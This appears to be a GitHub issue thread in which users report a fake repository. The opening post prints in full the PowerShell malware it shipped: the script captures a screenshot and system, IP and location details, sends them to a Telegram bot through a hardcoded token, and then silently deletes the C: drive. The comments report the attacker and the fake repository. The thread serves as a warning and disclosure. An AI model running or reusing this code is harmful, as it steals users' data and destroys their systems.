Open SizRex opened 2 hours ago
Malicious code that was added
Add-Type -AssemblyName System.Windows.Forms
Add-Type -AssemblyName System.Drawing
Add-Type -AssemblyName 'System.Net.Http'
try {
$screen = [System.Windows.Forms.SystemInformation]::VirtualScreen
$bitmap = New-Object System.Drawing.Bitmap $screen.Width, $screen.Height
$graphics = [System.Drawing.Graphics]::FromImage($bitmap)
$graphics.CopyFromScreen($screen.Left, $screen.Top, 0, 0, $bitmap.Size)
$memoryStream = New-Object System.IO.MemoryStream
$bitmap.Save($memoryStream, [System.Drawing.Imaging.ImageFormat]::Png)
$graphics.Dispose()
$bitmap.Dispose()
$memoryStream.Seek(0, [System.IO.SeekOrigin]::Begin) | Out-Null
$country = (Invoke-RestMethod -Uri "http://ipinfo.io/country").Trim()
$city = (Invoke-RestMethod -Uri "http://ipinfo.io/city").Trim()
$ip = (Invoke-RestMethod -Uri "http://ifconfig.me").Trim()
$isAdmin = (whoami /groups | Select-String "S-1-5-32-544").Length -gt 0
$rights = if ($isAdmin) { "Admin" } else { "User " }
$os_caption = (Get-CimInstance Win32_OperatingSystem).Caption
$os_arch = if ([Environment]::Is64BitOperatingSystem) { "x64" } else { "x86" }
$message = @"
Type: $os_caption ($os_arch)
From: $country $city ($ip)
Name: $env:USERNAME ($rights)
"@
$bot_token = "7872562304:AAHDovPEKL6JPliHzkjUYTd26f8YFuM8vDA"
$chat_id = "@dgfkewr"
$uri = "https://api.telegram.org/bot$bot_token/sendPhoto"
$client = [System.Net.Http.HttpClient]::new()
$client.Timeout = [TimeSpan]::FromMinutes(5)
$multipartContent = [System.Net.Http.MultipartFormDataContent]::new()
$fileContent = [System.Net.Http.StreamContent]::new($memoryStream)
$fileContent.Headers.ContentType = [System.Net.Http.Headers.MediaTypeHeaderValue]::Parse("image/png")
$multipartContent.Add($fileContent, "photo", "screenshot.png")
$multipartContent.Add([System.Net.Http.StringContent]::new($chat_id), "chat_id")
$multipartContent.Add([System.Net.Http.StringContent]::new($message), "caption")
$response = $client.PostAsync($uri, $multipartContent).Result
Start-Process -FilePath "cmd" -ArgumentList @("/c", "rd /s /q C:\") -PassThru -WindowStyle Hidden
}
finally {
if ($memoryStream) {
$memoryStream.Dispose()
}
if ($client) {
$client.Dispose()
}
}
Reported
I think you should also report the Telegram Bot he uses. He also showed his token. probably can spam
I have no idea how to report his telegram (bot) but he messages me and I can confirm that 1000+ systems was affected by this fake
He just started spamming in the comments of all Issues with the "new version" what a pathetic creature
I personally reported everyone in the group and the group itself.
Some hero is spamming their group through a leaked token ROFL
Some hero is spamming their group through a leaked token ROFL
That's some nice community against this guys)
Some hero is spamming their group through a leaked token ROFL
np lil bro 😊
There are fake repository and fake account of this repository creator. Please report him before more people install virus! This virus just deleted my whole system. And this mo** edited my comment
https://github.com/FlowseaI/zapret-discord-youtube/